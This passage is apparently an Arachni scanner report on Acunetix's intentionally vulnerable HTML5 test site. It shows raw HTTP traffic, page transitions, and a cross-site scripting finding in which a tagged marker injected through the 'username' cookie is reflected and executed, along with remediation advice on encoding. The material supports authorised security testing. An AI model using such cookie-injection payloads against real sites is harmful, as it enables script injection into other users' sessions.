item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/github" target="_blank" class="ng-binding" href="http://twitter.com/github" data-arachni-id="-279974877">@github</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/github" target="_blank" href="http://twitter.com/github" data-arachni-id="750470370"><b class="ng-binding">@github</b></a><br> Today, custom domains on GitHub Pages are gaining support for HTTPS via @letsencrypt. It's another step towards making the web more secure for everyone. <br><br> </div> </div> </div> </div> <ul class="pager ng-scope"> <li><a ng-href="#/popular/page/-1" ng-show="page>0" href="#/popular/page/-1" style="display: none;">Previous</a></li> <li><a ng-href="#/popular/page/1" ng-show="filter==''" href="#/popular/page/1" data-arachni-id="2424595">Next</a></li> </ul></div></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId">admin<xss_dom_0c25785427908905790d3a663dc49fa7></xss_dom_0c25785427908905790d3a663dc49fa7> is coming from <b>unknown</b> and has visited this page <b>5</b> times.</div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 
2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body ng-pristine ng-valid" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); 
_arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><div class="fb-comments" data-num-posts="4" data-width="470" data-href="http://testhtml5.vulnweb.com/"></div> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script 
src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><iframe name="ads_ads_frame" src="http://ads.bxss.me/ad_server.php?zone_id=234&ad_client=723898932&u_h=1080&u_w=1920&pn=&ref=&url=http://testhtml5.vulnweb.com/&" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" frameborder="0" height="1" scrolling="no" width="1" style="background-color:#FFFFFF;"></iframe> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body></html> |
This is the original HTTP response body.
| <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"xss_dom_0c25785427908905790d3a663dc49fa7":{"stop_at_first":false,"trace":true},"username":{"stop_at_first":true,"trace":false},"admin":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp"> <head> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, 
initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>. 
</p> <p class="navbar-text pull-right"> Welcome <b>admin<xss_dom_0c25785427908905790d3a663dc49fa7/></b> | <a href='/logout'>Logout</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular">Popular</a></li> <li><a href="#/latest">Latest</a></li> <li><a href="#/carousel">Carousel</a></li> <li><a href="#/archive">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about">About</a></li> <li><a href="#/contact">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId"></div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). 
Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // 
Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script 
src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body> </html> |
Transitions describe, as a series of events, the steps required to restore the page to the state it had when the scanner processed it. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options |
|---|---|---|---|---|
| 0 | 9.163898 | load | page | |
| 1 | 3.86217 | request | http://testhtml5.vulnweb.com/ | |
| 2 | 3.554117 | request | http://testhtml5.vulnweb.com/static/app/services/itemsService.js | |
| 3 | 0.30496 | request | http://testhtml5.vulnweb.com/ajax/popular?offset=0 | |
| 4 | 0.812222 | request | http://testhtml5.vulnweb.com/static/app/partials/itemsList.html | |
| 5 | 0.570796 | request | http://testhtml5.vulnweb.com/static/scr/default.png | |
| 6 | 0.800369 | click | `<a href="#/archive" data-arachni-id="916551842">` | |
| 7 | 0.355032 | request | http://testhtml5.vulnweb.com/static/app/partials/archive.html | |
| 8 | 0.250829 | request | http://testhtml5.vulnweb.com/ajax/archive | |
Raw HTTP request used to retrieve the page.
GET / HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.4
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,*
Host: testhtml5.vulnweb.com
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:56:58 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
<a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<!-- App libs -->
<script src="/static/app/app.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/libs/sessvars.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/post.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/controllers/controllers.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/services/itemsService.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://bxss.s3.amazonaws.com/ad.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
This is the original HTTP response body.
Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.
Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation.
If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS).
Arachni has discovered that it is possible to force the page to execute custom JavaScript code.
To remedy XSS vulnerabilities, it is important to never use untrusted or unfiltered data within the code of an HTML page.
Untrusted data can originate not only from the client but potentially from a third party, a previously uploaded file, etc.
Filtering of untrusted data typically involves converting special characters to their HTML entity encoded counterparts (however, other methods do exist, see references). These special characters include: & < > " ' /
An example of HTML entity encoding is converting < to &lt;.
Although it is possible to filter untrusted input, there are five locations within an HTML page where untrusted input (even if it has been filtered) should never be placed:
Each of these locations has its own form of escaping and filtering.
Because many browsers attempt to implement XSS protection, any manual verification of this finding should be conducted using multiple different browsers and browser versions.
cookie input username using GET at http://testhtml5.vulnweb.com/login pointing to http://testhtml5.vulnweb.com/.
| # | Cookie |
|---|---|
| 0 | username=admin; Path=/ |

| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
| cookie | http://testhtml5.vulnweb.com/login | http://testhtml5.vulnweb.com/ | | |
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time (s) | Event | Element | Options |
|---|---|---|---|---|
| 0 | 2.753966 | load | page | |
| 1 | 0.101266 | request | http://testhtml5.vulnweb.com/ | |
| 2 | 0.30972 | request | http://testhtml5.vulnweb.com/static/app/app.js | |
| 3 | 1.032875 | request | http://testhtml5.vulnweb.com/static/app/libs/sessvars.js | |
| 4 | 0.319147 | request | http://testhtml5.vulnweb.com/static/app/post.js | |
| 5 | 1.133606 | request | http://testhtml5.vulnweb.com/static/app/controllers/controllers.js | |
| 6 | 0.290224 | request | http://testhtml5.vulnweb.com/static/app/services/itemsService.js | |
| 7 | 0.91418 | request | http://testhtml5.vulnweb.com/static/css/style.css | |
| 8 | 0.302201 | request | http://testhtml5.vulnweb.com/static/img/logo2.png | |
| 9 | 0.262858 | request | http://testhtml5.vulnweb.com/static/app/partials/popular.html | |
| 10 | 0.300197 | request | http://testhtml5.vulnweb.com/static/app/partials/itemsList.html | |
| 11 | 0.299201 | request | http://testhtml5.vulnweb.com/ajax/popular?offset=0 | |
| 12 | 0.248878 | request | http://testhtml5.vulnweb.com/static/scr/default.png | |
Execution-flow sinks log the successful execution of an injected JavaScript payload within the page's JavaScript environment. Each sink is a point of payload execution; here the injected payload calls the scanner's log_execution_flow_sink() function, which is what proves the code ran.
| # | Data |
|---|---|
| 0 | No helper data logged. |
Raw HTTP request used to retrieve the page.
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:58:21 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"username":{"stop_at_first":true,"trace":false},"admin":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
